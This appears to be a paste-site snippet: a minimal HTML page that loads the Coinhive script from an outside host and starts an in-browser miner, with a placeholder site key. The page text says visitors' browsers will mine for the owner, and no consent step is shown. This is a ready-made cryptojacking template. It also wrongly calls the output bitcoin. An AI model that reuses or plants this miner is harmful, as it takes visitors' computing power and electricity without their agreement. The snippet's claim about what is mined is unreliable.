Untitled
unknown
plain_text
3 years ago
400 B
8
Indexable
<html>
<head>
<title>My Bitcoin Mining Website</title>
</head>
<body>
<h1>Welcome to My Bitcoin Mining Website</h1>
<p>Each time you visit this page, your browser will mine a small amount of bitcoin for me.</p>
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('YOUR_SITE_KEY');
miner.start();
</script>
</body>
</html>
Editor is loading...